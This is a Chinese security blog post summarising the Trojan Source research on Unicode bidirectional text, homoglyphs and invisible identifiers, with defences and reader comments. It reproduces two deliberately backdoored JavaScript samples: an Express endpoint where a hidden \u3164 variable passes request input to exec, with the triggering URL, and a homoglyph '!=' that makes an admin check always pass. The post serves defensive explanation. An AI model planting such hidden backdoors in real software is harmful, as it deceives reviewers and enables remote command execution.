Trojan Source

bigbrother 2021-11-22 09:27:00

近期国外发布了一篇关于unicode Bidirectional text(双向文本)的安全研究,终于抽时间看完了,发现还是很有趣的,抽时间总结一下。

0x00 双向文本

首先来简单介绍一下什么是双向文本(Bidirectional tex),双向文本就是一个字符串里面,包含了两种文字,既包含从左到右的文字,又包含从右向左的文字。
我们最熟悉的中文是从左向右的书写方式,还有少数文字是从右向左的书写方式。特别是网站国际化的场景下比较常见。
下面这个表格是论文中提到的unicode排序相关的字符

类型 缩写 unicode编码 名称 描述
显示方向嵌入 LRE U+202A LEFT-TO-RIGHT EMBEDDING 将以下文本作为嵌入式left-to-right
显示方向嵌入 RLE U+202B RIGHT-TO-LEFT EMBEDDING 将以下文本作为嵌入式right-to-left
显示方向重写 LRO U+202D LEFT-TO-RIGHT OVERRIDE 后面的字符被视为强left-to-right字符
显示方向重写 RLO U+202E RIGHT-TO-LEFT OVERRIDE 后面的字符被视为强right-to-left字符
显示方向隔断 LRI U+2066 LEFT-TO-RIGHT ISOLATE 将下面的文本视为孤立的left-to-right
显示方向隔断 RLI U+2067 RIGHT-TO-LEFT ISOLATE 将下面的文本视为孤立的right-to-left
显示方向隔断 FSI U+2068 FIRST STRONG ISOLATE 将下面的文本视为孤立的,它的方向是是第一个强字符的方向,并且不是内部的一个嵌套隔断。
终止显示方向嵌入和重写 PDF U+202C POP DIRECTIONAL FORMATTING 终止最近的LRE,RLE,LRO或RLO
终止显式方向隔断 PDI U+2069 PDI POP DIRECTIONAL ISOLATE 终止最近的LRI或RLI

文本中是
RLI a b c PDI
而显示实际是
c b a

文本中是
RLI LRI a b c PDI LRI d e f PDI PDI
而实际上显示的是
d e f a b c
文本实际内容和我们看到的不一样,如果文本中的代码可以被正确执行,而我们看到的又是另外的代码,那么必然存在安全风险。

0x01 trojan source

bidi的安全风险

论文的作者针对C、C#、C++、Go、Java、Javascript、Python和Rust 这8种语言进行了测试,相关代码在github上,下载地址在文末。
我们以python代码举例:
代码实际内容为
1.png
但是通过编辑器打开,可能显示的如下内容
2.png
因为通过RLO、LRI和PDI改变了显示方向。
通过python3执行
3.png
代码显示的和我们最终的执行结果是不一致的。

github上面的显示是存在问题的,不过已经有了提示。点击链接可以看到具体的内容。
4.png
我们来看一看常见IDC和编辑器的显示是不是有问题呢
pychram
5.png
vscode
6.png
sublime
7.png
cat
8.png
101 Editor
9.png
vim
10.png
more
11.png
那么其他的常用编辑器,像系统自带的、notepad++之类的呢?

同形字符

这个场景相对来说很常见了,不过大多数都集中在web端,其实可以发散到很多场景下,例如绕过一些设备的检测,是有想象空间的。
我们来通过作者论文中的代码来举例。
1.png
直观的从输出上我们是看不出任何区别的。
通过十六进制显示
2.png
可以看到区别了,显示的都是H,但是实际是不同的字符。
十六进制表示为0xd09d的字符,是unicode编码为U+041D的字符。其实还有很多类似的字符,我们来贴张图展示一下,相关字符都可以在这个网站查询到。
3.png

最后文章作者针对不同的操作系统上面的不同编辑器进行了一个统计
4.png

0x02 基于语言特性的安全风险

基于javascript语言特性使用不可见字符导致的安全风险

在上篇论文发表不久,有人发表了一篇因为Javascipt语言特型导致的安全风险
原理是找到一个不可见的(即无法显示的)Unicode字符,并且该字符可用于JavaScript的标识符/变量名称。实际上,从ECMAScript 2015版本开始,所有具有Unicode属性ID_Start的Unicode字符都可用于标识符(具有属性ID_Continue的字符可用于首写字符之后),然后找一个合理的场景触发即可。
作者是以\u3164这个字符,来展示相关的安全风险。

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

直观的看源代码,是发现不了任何问题的。
其实是存在不可见字符,然后导致了命令执行。

const { timeout,\u3164} = req.query;

通过请求下面的url,可以导致命令执行(%E3%85%A4是\u3164的url编码,具体的如何转换可以参考这篇文章)

http://host:8080/network_health?%E3%85%A4=<any command>

我们对代码进行微调,来更好的展示,检测本地网络,同时打印传递的变量(因为字符是不可见的,所以cat也看不到)
1.png
这是正常的功能
2.png
下面我们通过不可见字符触发命令执行
3.png

基于javascript语言特性使用同型字符导致的安全风险

const [ ENV_PROD, ENV_DEV ] = [ 'PRODUCTION', 'DEVELOPMENT'];
/*  */
const environment = 'PRODUCTION';
/*  */
function isUserAdmin(user) {
    if(environmentǃ=ENV_PROD){
        // bypass authZ checks in DEV
        return true;
    }

    /*  */
    return false;
}

直观的阅读代码,通过environment变量来判断是否为生产环境。
那么真的是这样吗?其实这里使用的“感叹号”,不是真的“感叹号”,是一个“ALVEOLAR CLICK”字符,所以这里的把ENV_PRO变量赋值给environmentǃ,是一个赋值语句,if的判断始终为true(其他语言这么写会提示语法错误)。
类似的字符还有很多,作者在文章结尾提供unicode官方发表的安全使用注意事项

0x03 防御方案

  • 文本统一编码。
  • 对非常规的字符和不可见字符进行扫描和处理。
  • 选一个靠谱的编辑器。

tips

ANSI转义序列,在terminal中也有很多有趣的点,有兴趣的可以去研究研究。
另外参考里面有一篇关于第三方源安全风险的讨论,我就不多写了。

最后

近些年供应链安全问题层出不穷,最新的研究成果对防御工作提出了更高的挑战,利用有限的资源,来防御无限的攻击,如何取的一个平衡,这是门艺术。

参考

文章官网
https://www.trojansource.codes/
论文
https://www.trojansource.codes/trojan-source.pdf
代码地址
https://github.com/nickboucher/trojan-source
github关于告警的提示
https://github.blog/changelog/2021-10-31-warning-about-bidirectional-unicode-text/
bidi算法
https://blog.csdn.net/minibeargui/article/details/24888797
http://www.unicode.org/reports/tr9/
utf8和unicode字符映射集
https://www.utf8-chartable.de/unicode-utf8-table.pl
javascript语言特性导致的安全风险
https://certitude.consulting/blog/en/invisible-backdoor/
ASCII、unicode和utf-8编码的介绍
https://www.ruanyifeng.com/blog/2007/10/ascii_unicode_and_utf-8.html
unicode官方提供的安全注意事项
https://unicode.org/reports/tr36/#visual_spoofing
常见的容易混淆的unicode
http://www.unicode.org/Public/security/latest/confusables.txt
供应链安全
https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/

评论

secdragon 2021-11-23 10:42:11

参考最后一个链接,各甲方还是应当注意一下!

Sky 2021-11-23 15:19:42

快把你着急死了,懂的人自然懂,不要慌😂

Sky 2021-11-25 14:27:10

有一个检测工具
https://github.com/ariary/TrojanSourceFinder

浩天 2021-12-01 17:08:54

@@!

B

bigbrother

这个人很懒,没有留下任何介绍

twitter weibo github wechat

随机分类

漏洞分析 文章:212 篇
前端安全 文章:29 篇
事件分析 文章:223 篇
区块链 文章:2 篇
神器分享 文章:71 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录